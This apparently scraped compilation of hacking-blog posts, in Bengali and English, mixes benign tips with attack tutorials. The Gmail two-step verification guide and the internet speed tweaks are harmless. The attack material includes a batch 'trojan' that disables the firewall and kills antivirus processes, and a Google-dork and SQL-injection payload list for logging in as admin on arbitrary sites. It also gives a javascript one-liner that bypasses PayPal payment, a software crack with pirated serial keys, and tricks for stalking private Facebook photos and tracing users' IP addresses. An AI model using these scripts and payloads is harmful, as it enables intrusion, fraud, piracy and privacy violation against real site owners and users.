TROJAN INJECTING AND TROJAN BACKDOR.......

ট্রোজান আর ব্যাক ডোর হল দুটি পদ্ধতি যার মাধ্যমে একজন হ্যাকার কোন সিস্টেম এ প্রবেশ করতে পারেন ।সাধারনত ব্যাক ডোর বা ট্রোজান একটি সিস্টেম এ অন্য কোন প্রোগ্রাম এর মাধ্যমে প্রবেশ করে ।ইথিকাল হ্যাকার সাধারন ভাবে পরীক্ষা করার জন্য এগুলো ব্যাবহার করে থাকেন । এই দুটি হল ম্যালওয়ার এর একটি রুপ যা অন্য কোন সার্ভার এ অন্য ফাইল এর মাধ্যমে যাবার চেষ্টা করে ।

আর ব্যাক ডোর বলতে বোঝানো হয় একটি পথ তৈরি করা যার মাধ্যমে  ট্রোজান কোন সিস্টেম এ প্রবেশ করে। সাধারনত ট্রোজান কোন অন্য ছবি বা মিউজিক ফাইল এর মাধ্যমে ছড়িয়ে যায় । এতে Steganography পদ্ধতি টি ব্যাবহার করা হয় । এটি সম্পর্কে না যানলে আমি এ নিয়ে লিখেছি । সেটি পড়ে নিবেন ।। সাধারন ভাবে ট্রোজান ছড়ানোর সবথেকে সহজ উপায় হল ব্যাচ ফাইল বা একে .exe তে রুপান্তর করে ইন্সটলার এর মাধ্যমে ছড়িয়ে দেয়া । এতে হ্যাকার রা বিভিন্ন ধরনের GUI ব্যাবহার করেন অন্য দের আকৃষ্ট করার জন্য ।
কয়েকটি কমন ট্রোজান  :
BackOrifice
Deep Throat
NetBus
Whack a mole
Girlfriend
Masters Paradise

এগুলর মধ্যে সবথেকে বিপদজনক হচ্ছে  Girlfriend এবং Netbus । কারন এগুলো ব্যাচ ফাইল এর মাধ্যমে তৈরি করা যায় । এবং কোডের কয়েকটি লাইন পরিবর্তন করে দিলেই দুর্ধর্ষ ভাইরাস  এ পরিনত হয় । আপনি যদি হ্যাকার হতে চান বা সিকিউরিটি নিয়ে কাজ করতে চান আপনাকে অবশ্যই এগুলো নিয়ে কাজ করতে হবে । কিন্তু নিজের কম্পিউটার এ গুলো নিয়ে ঘাটাঘাটি না করে কোন ভার্চুয়াল পরিবেশ তৈরি করাই ভাল । যেমন যারা Comodo  এর ভার্চুয়াল সিকিউরিটি ব্যাবহার করেন তারা যানেন । এই ভাইরাস গুলো নিয়ে কাজ করা কতটা বিপদজনক ।
ট্রোজান এর প্রকারভেদ
বিভিন্ন ধরেনের ট্রোজান আছে । সেগুলর কয়েকটি নিচে তুলে ধরা হল :
Remote Access Trojans : কোন সিস্টেম এ রিমোট অ্যাক্সেস পেতে ব্যাবহার করা হয়

Data Sending Trijans : এটি সাধারনত ডাটা খুঁজে বের করে হ্যাকার এর কাছে তা পাঠিয়ে দেয় ।
Destructive Trojans: এর সাহায্যে কম্পিউটার এর ক্ষতি করা হয় ।
FTP trojans: এটিকে ব্যাবহার করতে হ্যাকার রা port 21 ব্যাবহার করে থাকেন ।
SSDT: এটির পূর্ণরূপ আপনারা কাজ শুনলেই বুঝতে পারবেন । এর মাধ্যমে কোন নির্দিষ্ট বা অনেকগুল antivirus প্রোগ্রাম কে অকেজ   করে দেয়া হয় ।
কয়েকটি ট্রোজান প্রোগ্রাম

Troj_OAJ

এই ট্রোজান টি যে কোন নোটপ্যাড ফাইল কে টারগেট করে । এরপর সেটিকে word ফরমেট পরিবর্তন করে note.com এ নিয়ে যায় । এরপর সেটি windows এর নোটপ্যাড ফোল্ডার এ কপি হয় । এরপর আপনি যতবার নোটপ্যাড খুলবেন ততবার এই ভাইরাস টি আক্টিভ হবে ।
Donald Duck
এটি একটি ব্যাক ডোর ট্রোজান । এটি হ্যাকার কে যেকোনো সিস্টেম এ পুরপরি নিয়ন্ত্রন এনে দেয় । এটার সাথে একটি কি লগার এবং রেজিস্ট্রি এডিট করার প্রগ্রাম থাকে ।এর সাহায্যে সিডি বা ডিভিডি রম খোলা বা বন্ধ করাও সম্ভব হয় । এটি ইঞ্জেক্ট করতে হ্যাকার23476 ও ২৩৪৭৭ ব্যাবহার করে থাকেন
CyberSpy

এটি মূলত একটি স্পাই প্রোগ্রাম । এটি রেজিস্ট্রি তে নিজেকে এন্ট্রি করে নেয়। যার ফলে আন্টিভাইরাস দিয়ে ডিলিট করে দিলেও কম্পিউটার রিবুট করলে আবার এটি আক্টিভ হয়ে যায় ।
Firekill 2000
এই ট্রোজান টি মারাত্তক । এটি সব ধরনের ফায়ারওয়াল , এন্টিভাইরাস কে disable করে দিতে সক্ষম । এমনকি এটি সিকিউরিটি সফটওয়্যার এর নিরাপত্তা  কে ধ্বংস করতে .dll ফাইল কে ডিলিট করে দেয় । তখন সিস্টেম আবার সেটআপ দিতে হয় ।
এছাড়া আর অনেক ট্রোজান প্রোগ্রাম আছে । অনেক ট্রোজান Netcat এর সাহায্যে launch করা হয় । আবার অনেক ট্রোজান সার্ভার রুটিং করে ইঞ্জেক্ট করা হয় ।

একটি ট্রোজান ভাইরাস
এটি আমার নিজের কোড করা একটি ছোট ট্রোজান । এটি এন্টিভাইরাস এর সিকিউরিটি কে রুখে দিতে পারবে ।  এটি মূলত আপনার ওয়িন্দএস এর ফায়ার ওয়াল ও এন্টিভাইরাস এর safe guard কে রুখে দেবে । এটির ইন্টারফেস সবুজ রঙের।  
@ echo off
_Rashed Hasan_

∙ rem –
  colour Db 03
∙ rem Permanently Kill Anti-Virus
∙ net stop “Security Center”
netsh firewall set opmode mode=disable ∙ tskill /A av* ∙
tskill /A fire*
tskill /A [...].
_BCA_
আপনাদেরকে আর ও একটি বিধ্বংসী ট্রোজান এর লিঙ্ক দিতে পারি । কিন্তু সেটি কম্পিউটার এ রান করবেন না । একটি সহজ ট্রিক হচ্ছে কপি পেস্টিং সাইট যেমন http://www.pastebin.com এ যেয়ে পেস্ট করে সেভ করবেন। সেটি যদি কোন ভাইরাস হয় তবে দেখতে পাবেন আপনার এন্টিভাইরাস সিকিউরিটি warning দেবে। আর সেই লিঙ্ক এ প্রবেশ করতে  গেলে আপনার ব্রাউযার থেমে যাবে ।
এই ভাইরাস টি কোন অবস্থাতেই রান করবেন না । এটি ভারতের একজন সিকিউরিটি এক্সপার্ট এর কোড করা
http://www.breakthesecurity.com/2010/12/how-to-disabledelete-your-victims.html

বাঁচার কিছু উপায়
> আপনি যে এন্টিভাইরাস ব্যাবহার করে থাকুন না কেন সেটি আপ টু ডেট থাকতে হবে ।
> সন্দেহ জনক কোন টুল বা লিঙ্ক এ ক্লিক করবেন না ।
> আপনার antivirus এর পাশাপাশি  anti spam ও anti rootkit ব্যাবহার করবেন । আমি বলব অ্যান্টিভাইরাস এর সাথে আপনি kaspersky এর TDS killer টুল টী ব্যাবহার করতে পারেন । এটি পুরো পুরি পোর্টেবল একটি টুল ।

তাহলে আজ এই পর্যন্তই ছিল ।

Manual Sql Injection Attack ?

Hello every one .i am a sabbir.i am a gray hat hacker.


I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry

to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately

 most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries

into a database or using queries to get authorization bypass as an admin.

Things you should know :

Data is in the columns and the columns are in tables and the tables are in the database .

Just remember that so you understand the rest .

PART 1 - Bypassing Admin log in ?

Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp

First we need 2 find a site, start by opening google.
 
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"

There is a large number of google dork for basic sql injection.

here is the best:

Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.

the site should look something like this :

ADMIN USERNAME :

PASSWORD :

so what we do here is in the username we always type "Admin"

and for our password we type our sql injection

here is a list of sql injections

Code:
' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

So your input should look like this

username:Admin


password:'or'1'='1


that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in :D

                                                                  enjoy enjoy enjoy

Strongest way to protect Gmail Account Unhckable 2-step Verification


Today I’m going to tell you about protecting your Gmail account. Gmail is considered to be one of the strongest accounts to break into. But recently, it has been proven that it can be done. We have to be very careful in securing our passwords so that other networks like Facebook, Orkut and Google Plus are not compromised as well. Since social networking plays a prominent role in our life, we have to secure our email accounts with which they are linked up. The Gmail team has setup a 2 step verification process to strengthen your account. Here’s how to do it.
protecting gmail 

The main reason to strengthen your Google account is that it is a common account for many other services. With a single Gmail id you are accessing other services of Google like Android, Google Plus, Adsense, Adwords, Orkut, and a lot other services. So if you are using all of those services and want to protect your ID, you should follow this procedure.

Protecting Gmail Using 2-Step Verification :


I will just add some screenshots to makethe procest understandable. Just follow the simple steps below. Before getting into the step 2 verification, make sure you have setup your recovery options. In case you have lost your password, you can get it back immediately. You can set the recovering options just above the using 2 step verification option, as shown in below screenshot.
1) Login to your Google Account. You can Login either from Google.com or Gmail.com and after logging in, Just click on Account Settings as shown in below screenshot to go to the options page.
2 step verification
2)  Now click on Using Step 2 Verification which is highlighted as number 2 in above click. Then you will be asked to click on a Start Setup Option in the next page.
3) After that you will be redirected to another page where you have to enter your mobile details. You can select the 2ways of setting up your step 2 verification process. One is land line or Mobile phone conformation and the other is the smart phones setup (eg: android, blackberry and iPhone). Take a look at the screenshot below. I have selected the normal phone text verification process since i am using a normal Samsung Corby TXT mobile.
step 2 verifictaion stage 2
4) As you can see in the above picture, the first red mark option is where we have selected our SMS or Voice Call option and at step 2 you have to enter your mobile number so it takes you further. I suggest SMS text message as shown in step 3. So after entering the phone and the option, click on the Send Code option (4). you will receive a code to your mobile, just enter it and verify. Click on next to move the next page.
5) This is the page where you are verified and asked to store some verification backup numbers in case you lost your number or phone. Just take a screenshot of those numbers and keep it with you. They are really useful when you have lost your mobile phone. Take a look at the screenshot below.
2 step verification codes
 6) You have to enter another backup phone number to move to the next step. Put any friend’s number or your other alternate number to verify it. Now its done. You can directly access you turn your Step 2 Verification access.Just click on the Step 2 Verification as seen in below screenshot.

Now Most Important Phase Of Protecting Gmail : Activating Step 2-Verification

7) As you can see in the above screenshot that all your account sources are verified. Now after click Turn on 2-Step  Verification button above, you will warned that you will be logged out of all the access which you have from satishcoolpctips@gmail.com Google account. For a better idea, Look at the screenshot below.
8 ) Click OK to proceed further. After clicking OK here your access to the Gmail id which you have secured will be very strong. Just take a look at the screenshot below.
 
9) That’s it.. Now your Gmail account is step 2 verified account. So each and every time when you want to login your Gmail account, You will be sent a verification code to your mobile which has to be entered in the above Enter code : option to access your Gmail services. In this way you can protect Gmail services which you want. If you want to know more, then Click here :Tutorial
Remember that you cannot access your GTALK while protecting Gmail account when step 2 verification ON. you are using the Step 2-Verification process. If you want to chat with your mates, you can always chat from the Gmail inbuilt chat. That’s all for today, If you have any queries, please let me know with a simple comment below. Also please share with us any more ways of protecting Gmail.

View Private Photos on Facebook








    Earlier days many of them contacted me to get the trick to view the private photos of their friends on Facebook.I know it is very difficult to find out this.After these i have tried more seriously to know about this and at last i got the trick to view the photos that secretly saved in their Facebook profile.

Facebook Photo Stalker::

    I have found an application named Facebook Photo Stalker from Facebook that can show the secret photos and other information from anyone who use Facebook and secretly saved his photos.
    It is an application and it is developed by Josh Owns and it is a very useful software for those who like to view photos.


Steps to get Facebook Photo Stalker:

  • Go to Photo Stalker Application page
  • It shows allow application to access your profile, then click on Allow
  • It takes you to the application page as screenshot shown below
  • It shows a box to put Friends ID/URL/Name of the person you want to see the photos.
  • Click on ‘Click Continue
  • You will see profiles below and select the profile you want to view photos.
    Note about Facebook photo stalker:
    Sometimes it will not work as it does not follow the privacy policy and terms of service. More Facebook tricks are coming soon…so please keep in touch..

How to increase internet speed


* First trick

Here’s a simple 3 minute tweak (XP Pro only) that will increase your broadband speed.
By default (even with QoS disabled) Windows XP reserves up to 20 percent of your connections bandwidth.
To override this reserve take the following steps.
Make sure you Log on as Administrator, not as a user with Administrator privileges.

* Start > Run > type gpedit.msc
* You will see [Local Computer Policy]
* Expand the [Administrative Templates] branch
* Expand the [Network] branch
* Highlight [QoS Packet Scheduler]
* Double-click [Limit Reservable Bandwidth]
* Check [Enabled]
* Change [Bandwidth limit %] to 0 %
* Click [Apply] [OK]
* Restart
Effect is immediate.

*Second Tricks

Part 1 - Modify LAN Properties
Go to Start > Network Connections.
Right Click > Properties on your main internet connection.
Make the following changes: Unselect everything except "Internet Protocol (TCP/IP)"



*Third trick

With WinXP Service Pack 2, Microsoft limited TCP connections to 10. Running the Lvllords patch will add more TCP connections and increase your speed.
Extract the patch and run it (see example):



Change the limit - Press "C" and set it to 100.


Press "Y". You’ll then be presented with with a Windows XP message saying that your original files are being replaced. Click "Ignore" or "Cancel" for that window, and choose "Yes" when asked for confirmation
If the Lvllords patch was successfully executed, you’ll get a ‘SUCCESS’ message.
Exit and reboot your computer.

* Forth Trick

host name resolution priority
Windows 2k/XP
First, open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipServiceProvider
Note the following lines (all hex dwords):
Class = 008 (8) – indicates that TCP/IP is a name service provider, don’t change.
LocalPriority = 1f3 (499) – local names cache
HostsPriority = 1f4 (500) – the HOSTS file
DnsPriority = 7d0 (2000) – DNS
NetbtPriority = 7d1 (2001) – NetBT name-resolution, including WINS
What we’re aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we’re aiming at is lower numbers without going to extremes, something like what’s shown below should work well:
Change the “Priority” lines to:
LocalPriority = 005 (5) – local names cache
HostsPriority = 006 (6) – the HOSTS file
DnsPriority = 007 (7) – DNS
NetbtPriority = 008 (8) – NetBT name-resolution, including WINS

==>Fifth trick

SG TCP Optimizer - using it!

Back already? Cool! So, this is where you use SpeedGuide's TCP Optimizer. How? Its your lucky day, my friend.

a) This program modifies your system registry (Nothing to worry about!) in order to boost your Internet speed. Here's what you have to do:


Please click the above image to enlarge* (Popup blocker must be disabled)
b) Choose your connection speed - mine is 256 kbps. Go down and select "Optimal Settings". Click on Apply changes after that. You'll be promoted with a box somewhat like this after that:


Please click the above image to enlarge* (Popup blocker must be disabled)
c) Click OK, and click "Yes" to reboot your computer. Thats all you need to have a full-on High Speed Internet Connection! Enjoy browsing, and don't forget to check out other tweaks & tricks present on this site

Trick To Bypass PayPal Payments


1

    Hello Friends, As the name suggests,Today i am going to tell you all a trick by use of which you will be able to download paid software's , Eboks, Games for free.The Tricks is very simple and works on more than 800 websites..!!! So I suggest you to use this trick when you seriously need because i don't take any responsibility for any harm caused due to this trick because this trick is for educational purpose only and so that if you are a webmaster or owner of a site which is using a java script Paypal button than you can immediately take steps to prevent users from downloading premium content from your site for free.

The Trick:-

    1). Open Google and search for the below line without removing the "quotes"

    "this order button requires a javascript enabled browser"
    NOTE:IF U WANT TO DOWNLOAD CONTENT OF YOUR INTERST OR CHOICE YOU CAN ADD THAT THING AFTER THE STRING.
    For Example if you want to download ebooks than search for "this order button requires a javascript enabled browser"ebooks
    2). Now Choose any site from the search results and wait till the site loads fully.
    3).Now copy the below line and paste it in your browser's address bar. as shown in the image below,
    javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);
    Now You will be redirected to the thankyou or Transaction complete page and now you will be able to download the free stuff provided by that website..!!

How To Trace Facebook User


This is a simple methods to trace Facebook user

Read the below steps carefully

open start -> select run -> type “CMD”    (With out   "   "   )

  • Now chat with your friend
  • and in CMD write “NETSTAT
  • and it will show all the IP address connected with your IP address.

The Next Step is to Trace that user using his IP address.


To do so we will be using IP tracer service. Go to the below address and paste the IP address in the box that says “lookup this ip or website”. and it will show you the location of the user.

CLICK HERE

It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. they will respond you.

Other netstat commands:
-a
Displays all connections and listening ports.
-e
Displays Ethernet statistics. This may be combined with the -s option.
-n
Displays addresses and port numbers in numerical form.
-p
proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s
option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r
Displays the routing table.
-s
Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
-p
option may be used to specify a subset of the default.
That's it.

Hack and Crack IDM (Internet Download Manager ) - How to?








    Hello Friends, Using this hack you can register the Internet Download Manager (IDM) for free using you own credentials i.e register on your Name and email ID.
    I am explaining the manual hacking method because most of my users said that patch and keygen contain viruses. This hack also works for trail IDM that means download a trail IDM from there site and register the professional i.e. full version of IDM with your credentials for free using my hack.

Hack or crack IDM manually:

    Step 1: Download the IDM trial or If you already have IDM installed Update it by going to Help---}} then to check for Updates.
    Step2: Now Go to START => Then go to RUN and type the following text and click enter:

    notepad %windir%\system32\drivers\etc\hosts
    Step3: Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below u will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on apply and then click on Ok, now u will be able to edit the hosts file and save changes in it.

Detail Note about Granting Permission In Windows7:

    For Windows 7 users, due to security reasons you will not be able to save hosts file.so follow this steps : First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see the hosts file.
    Now right click on hosts file and go to its properties then go to Security tab select Users under Group or user names and click on edit button,Permission For Host Window will get open, in that window select Users account and grant permission in bellow section which is "Permission for SYSTEM" by clicking all checkbox under "Allow" Name and press Ok.Dnt click on any Deny check box.
    Note: If you have login through admin then skip this step6 .Its just for granting permission for editing file.
    Step4: Now a notepad file appears something like this as shown below:
    Now copy the below lines of code and add to hosts file as shown above image box :
    127.0.0.1 tonec.com
    127.0.0.1 www.tonec.com
    127.0.0.1 registeridm.com
    127.0.0.1 www.registeridm.com
    127.0.0.1 secure.registeridm.com
    127.0.0.1 internetdownloadmanager.com
    127.0.0.1 www.internetdownloadmanager.com
    127.0.0.1 secure.internetdownloadmanager.com
    127.0.0.1 mirror.internetdownloadmanager.com
    127.0.0.1 mirror2.internetdownloadmanager.com
    After adding these piece of code, save the notepad file. And exit from there.
    Step5: Now open IDM and click on Registration. When you click on registration, Now a new dialog(window) appears that is asking for Name, Last Name, Email Address and Serial Key.

    Step6: Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:
    RLDGN-OV9WU-5W589-6VZH1
    HUDWE-UO689-6D27B-YM28M
    UK3DV-E0MNW-MLQYX-GENA1
    398ND-QNAGY-CMMZU-ZPI39
    GZLJY-X50S3-0S20D-NFRF9
    W3J5U-8U66N-D0B9M-54SLM
    EC0Q6-QN7UH-5S3JB-YZMEK
    UVQW0-X54FE-QW35Q-SNZF5
    FJJTJ-J0FLF-QCVBK-A287M
    And click on ok to register.
    Step7: After you click ok, it will show an message that you have registered IDM successfully.
    Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire.
    That means it will remain full version for life time and you can update it without any problem in future.

Proof of Successfully Hacking IDM:

    Note: To update idm you have to remove those websites added in the host file, after removing those website,save that Hosts file and update IDM software. After succesfull updation again follow above steps to crack Internet Download manager.
    I hope you are now able to convert your Trial version of IDM into Full Version. If you have any problem in this tutorial on Hack and Crack IDM,
    please mention it in comments. Enjoy.....

How To Login As Admin Of Any Website:

    Do you want to Admin of a website? Is this Possible? Yes! of-course it is Friends. Now this is possible with Tricks With Hacker. Today while surfing i came across a amazing but yet simple trick by the help of which you will be able to log in as the admin of any Website.
    Note -I don't take any responsibility for any harm caused due to this trick because this trick is for educational purpose only and so that if you are a webmaster or owner of a site which is using the same username and password can than you can immediately take steps to prevent unauthorized access to your site.

How To Login As Admin Of Any Website:

    Step 1). Go To Google.com and Then Search For the Following Piece of code,
    "adminlogin.asp" or "admin.asp"
    Step 2). Now Chose any website from the search results and then fill the below details in the login page,
    Username - admin
    Password - 'or''='
    Enjoy :P
    Warning- AgainI don't take any responsibility for any harm caused due to this trick because this trick is for educational purpose only.
    Hope you liked my article do share your views in the comments below.